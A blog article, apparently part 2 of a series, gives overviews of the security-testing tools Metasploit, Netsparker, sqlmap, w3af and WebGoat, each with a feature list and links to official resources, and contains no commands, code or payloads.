Exploitation Tools (part 2)

In this second article we continue to look at Exploitation tools that are available for Pentesting and Ethical Hacking. We examine the last 5 of the choices in our Best Exploitation Tool poll to help understand what they do, their main features, some examples, and where to find out more about them.

Metasploit

…Metasploit helps security teams do more than just verify vulnerabilities, manage security assessments, and improve security awareness; it empowers and arms defenders to always stay one step (or two) ahead of the game.

metasploit.com

MSF (Metasploit Framework) is available free for developers and security researchers whilst the Pro version is for penetration testers and IT security teams.

Both versions have access to 1500+ exploits whilst the Pro version has a web interface and automation capabilities. The free version uses a CLI (Command Line Interface) and has manual exploitation.

For further details on Metasploit checkout the following resources:

• Homepage:
  • https://www.metasploit.com
• Download:
  • https://www.metasploit.com/download
• Documentation:
  • https://docs.rapid7.com/metasploit

Netsparker

Netsparker is a web vulnerability management solution that focuses on scalability, automation, and integration. Based on a leading-edge web vulnerability scanner, the Netsparker platform uses proprietary Proof-Based Scanning™ technology to identify and confirm vulnerabilities, confidently indicating results that are definitely not false positives. Netsparker is highly effective both integrated within the SDLC and as a stand-alone solution.

netsparker.com

There are 3 versions of this commercial product:

• Netsparker Standard: Powerful yet user-friendly – the best web application security scanner for small and medium businesses.
• Netsparker Team: The most accurate cloud-based scanner for medium to large organizations.
• Netsparker Enterprise: The only web application scanner that scales to meet the needs of the largest organizations in the world.

For further details on Netsparker checkout the following resources:

• Homepage:
  • https://www.netsparker.com
• Demo:
  • https://www.netsparker.com/get-demo

sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

sqlmap.org

Features:

• Full support for IBM DB2, MS Access, MS SQL Server, MySQL, Oracle, PostgreSQL, SAP MaxDB, SQLite, Sybase plus others.
• 6 SQL injection techniques: boolean-blind, time-based blind, error-based, UNION query-based, stacked queries, and out-of-band.
• Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
• Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
• Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.

There are many other features as described here.

For further details on sqlmap checkout the following resources:

• Homepage:
  • http://sqlmap.org
• Download:
  • https://github.com/sqlmapproject/sqlmap
• Documentation:
  • https://github.com/sqlmapproject/sqlmap/wiki

w3af

w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.

w3af.org

Features:

• Daemons – framework implements web & proxy servers.
• Fast HTTP Client – offers proxy support, HTTP Basic & Digest authentication, UserAgent faking, custom request headers, cookie handling, HTTP response cache, DNS cache, and Multipart file upload.
• Output Manager – output can be written to Console, files (Text, CSV, HTML & XML formats), and Email.
• Fuzzing Engine – for injecting payloads into every part of the HTTP request.
• Knowledge base – central location for storing and sharing vulnerabilities, information disclosures, and other valuable items between plugins.
• Parsing – the framework tries to parse HTML to extract links & forms found during the crawl.

For further details on w3af checkout the following resources:

• Homepage:
  • http://w3af.org
• Download:
  • http://w3af.org/download
• Documentation:
  • http://docs.w3af.org/en/latest

WebGoat

Whilst this tool is not used to actually Penetration Test a target, it is a purposely vulnerable target to practice techniques and skills against.

WebGoat is a deliberately insecure application that allows interested developers just like you to test vulnerabilities commonly found in Java-based applications that use common and popular open source components.

WebGoat

WebGoat contains Lessons which currently include:

• A1) Injection (into, advanced & mitigation)
• A2) Broken Authentication
• A3) Sensitive Data Exposure
• A4) XML External Entities (XXE)
• A5) Broken Access Control
• A7) Cross-Site Scripting (XSS)
• A8) Insecure Deserialization
• A9) Vulnerable Components
• A8:2013) Request Forgeries

For further details on WebGoat checkout the following resources:

• Homepage & Download:
  • https://github.com/WebGoat/WebGoat
• Documentation:
  • https://github.com/WebGoat/WebGoat/wiki

---

If you have not yet voted in our poll then please check out the Best Exploitation Tool page.

If you have not read Part 1 of this article then please check it out.

If you have any questions or comments on the above please feel free to add them below.